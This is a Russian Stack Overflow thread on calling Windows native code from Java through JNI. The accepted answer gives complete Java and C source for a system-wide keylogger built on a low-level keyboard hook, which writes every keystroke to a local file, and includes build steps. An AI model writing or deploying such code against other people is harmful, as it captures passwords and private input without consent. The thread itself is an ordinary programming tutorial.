# Как подружить Java с системой через написание dll на C++

Tags: java, c++, c, windows

Окей. Как мне стало известно из изучения Java, что по сути Java не общается с самой операционной системой, она посылает запрос в JVM и обрабатывает его. Например получение Jav'ой доступу к принтеру. Но! Java не может получать доступ к регистру, автозапуску и прочим вещам. Окей я не буду вдаваться в подробности зачем, но просто есть необходимость.

Например у меня есть задача, определена точно ОС - Windows. И мне необходимо "хукать" нажатия клавиатуры, или производить эти нажатия самой программой. Я нашел решение - написание dll библиотеки на C++. Но как мне ее написать. Если мы пишем код на C++ подключая библиотеку windows.h для работы с winapi. И при этом скомпилированный этот код в виде библиотеки подрубаем в Java код. Ничего не потеряется?

Comment: Производить нажатия можно с помощью класса java.awt.Robot. А чтобы хукать, Вы правильно написали, необходимо нативно писать либу. Вот туториал по написанию на C http://stuf.ro/calling-c-code-from-java-using-jna

Comment: @AndrewBystrov а вот именно вложенные в библиотеку, которую я создам, стандартные библиотеки они никаким образом не отделяться/потеряются?

Comment: ну я не столь силен в jni, поэтому я могу только предположить, что не потеряются. Главное, чтобы они попали в либу, но это уже надо будет прописать в сборщике проекта ( ant/maven etc)

Comment: Посмотрите на [jnativehook](https://github.com/kwhat/jnativehook), библиотека делает половину того, что вам нужно, может пригодиться, как источник информации.

Comment: Вот здесь https://toster.ru/q/519411#answer_1199757 у меня инструкция - как писать библиотеку JNI, как ее использовать, как все собирать вместе, в общем, встроить C++ код в Java, для Windows. Инструкция несколько устаревшая (использую IDE NetBeans вместо IntelliJ и т.д.), но вполне рабочая и подробная. Для понимания подойдет однозначно, в IntelliJ принципиальных отличий нет.

Comment: зачем создавать велосипед? Есть замечательная библиотека [JNA](https://github.com/java-native-access/jna), уверен, многие необходимые функции уже реализованы до вас (Работа с реестром, автозапуском, аппаратной частью). По поводу передачи управления - есть класс `java.awt.Robot`.
p.s. JNA поддерживает не только Windows, но и различные вариации unix

Comment: Код нативной библиотеки скорее получится на C, чем на C++, хотя внутри кода функций, конечно, плюсовые фишки использовать никто не запретил...

Answer (score 1, accepted):

Из JVM есть несколько дверей в операционную систему - [JNI](https://ru.wikipedia.org/wiki/Java_Native_Interface), [JNA](https://en.wikipedia.org/wiki/Java_Native_Access) и JNR. JNI (Java Native Interface) - самый старый и чаще всего используемый способ взаимодействия с нативным кодом. Его минус в том, что он требует от программиста знания C/C++ и хорошего понимания принципов работы виртуальной машины. JNA (Java Native Access) - это надстройка над JNI изолирующая программиста от низкоуровневых деталей за счёт использования рефлексии и libffi. А где рефлексия, там низкая производительность и высокое количество рантайм ошибок. В JNR (Java Native Runtime) рефлексию заменили генерацией байткода, что существенно увеличило производительность. Это относительно молодой проект, я в нём ещё не копался и сказать ничего не могу. А вот пример примитивного кейлогера с использованием JNI показать могу.

**Snitch.java**

```
import java.io.Closeable;

// Чтобы автоматически отключать хук при
// завершении работы реализуем интерфейс Closeable
public class Snitch implements Closeable {
    // Объявляем нативные методы
    private native boolean init(String filePath);
    private native void listen();
    public native void close();

    public Snitch(String filePath) throws IntializatonException {
        if (!init(filePath))
            throw new IntializatonException();
    }

    public static void main(String[] args) {
        // Загружаем библиотеку реализующую
        // нативные методы
        System.loadLibrary("snitch");

        // Передаём путь к логфайлу и ловим нажатия клавиш
        try (Snitch snitch = new Snitch("C:\\Temp\\keyboard.txt")) {
            snitch.listen();
        }
        catch (IntializatonException exc) {
            System.err.println("Can't install hook!");
        }
    }
}
```

Компилируем командой `javac -h . Snitch.java`. Ключ `-h` указывает в каком каталоге создать заголовочный файл с определениями нативных методов.

**snitch.c**

```
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#include "Snitch.h"  // Заголовочный файл сгенерированный javac

FILE *fh;
HINSTANCE hInstance = NULL;
HHOOK hHook = NULL;

enum Keys {
    SHIFT = 16,
    CAPSLOCK = 20,
};

BOOL APIENTRY DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved) {
    switch(reason) {
        case DLL_PROCESS_ATTACH:
            hInstance = instance;
            break;
        default:
            break;
    }
    return TRUE;
}

LRESULT CALLBACK kbdProc(int code, WPARAM wParam, LPARAM lParam) {
    if (wParam == WM_KEYUP) {
        KBDLLHOOKSTRUCT *kbdStruct = (KBDLLHOOKSTRUCT*) lParam;
        DWORD wVirtKey = kbdStruct->vkCode;
        DWORD wScanCode = kbdStruct->scanCode;

        BYTE lpKeyState[256];
        GetKeyboardState(lpKeyState);
        lpKeyState[SHIFT] = 0;
        lpKeyState[CAPSLOCK] = 0;
        if (GetKeyState(VK_LSHIFT) < 0 || GetKeyState(VK_RSHIFT) < 0) {
            lpKeyState[SHIFT] = 0x80;
        }
        if ((GetKeyState(VK_CAPITAL) & 1) == 1) {
            lpKeyState[CAPSLOCK] = 0x01;
        }

        char result;
        ToAscii(wVirtKey, wScanCode, lpKeyState, (LPWORD)&result, 0);
        fprintf(fh, "%c", result);
    }

    return CallNextHookEx(hHook, code, wParam, lParam);
}

JNIEXPORT jboolean JNICALL Java_Snitch_init(JNIEnv* env, jobject obj, jstring filePath) {
    // Получаем указатель на массив символов строки
    const char *path = (*env)->GetStringUTFChars(env, filePath, NULL);
    if (path == NULL)
        return JNI_FALSE;

    // Открываем логфайл
    if (!(fh = fopen(path, "a")))
        return JNI_FALSE;

    // Делаем строку доступной сборщику мусора
    (*env)->ReleaseStringUTFChars(env, filePath, path);

    // Регистрируем хук
    if (!(hHook = SetWindowsHookEx(WH_KEYBOARD_LL, kbdProc, hInstance, 0)))
        return JNI_FALSE;

    return JNI_TRUE;
}

JNIEXPORT void JNICALL Java_Snitch_listen(JNIEnv* env, jobject obj) {
    MSG message;
    while(GetMessage(&message, NULL, 0, 0)) {
        TranslateMessage(&message);
        DispatchMessage(&message);
    }    
}

JNIEXPORT void JNICALL Java_Snitch_close(JNIEnv* env, jobject obj) {
    if (hHook)
        UnhookWindowsHookEx(hHook);

    if (fh)
        fclose(fh);
}
```

Компилируем c'шный исходник в snitch.dll, запускаем нашу программу командой `java Snitch` и убеждаемся, что в C:\Temp\keyboard.txt регистрируются нажатые клавиши.

Чуть более подробно о процессе компиляции и объявлениях JNI-методов можно посмотреть в [другом моём ответе](https://ru.stackoverflow.com/a/678881/204271).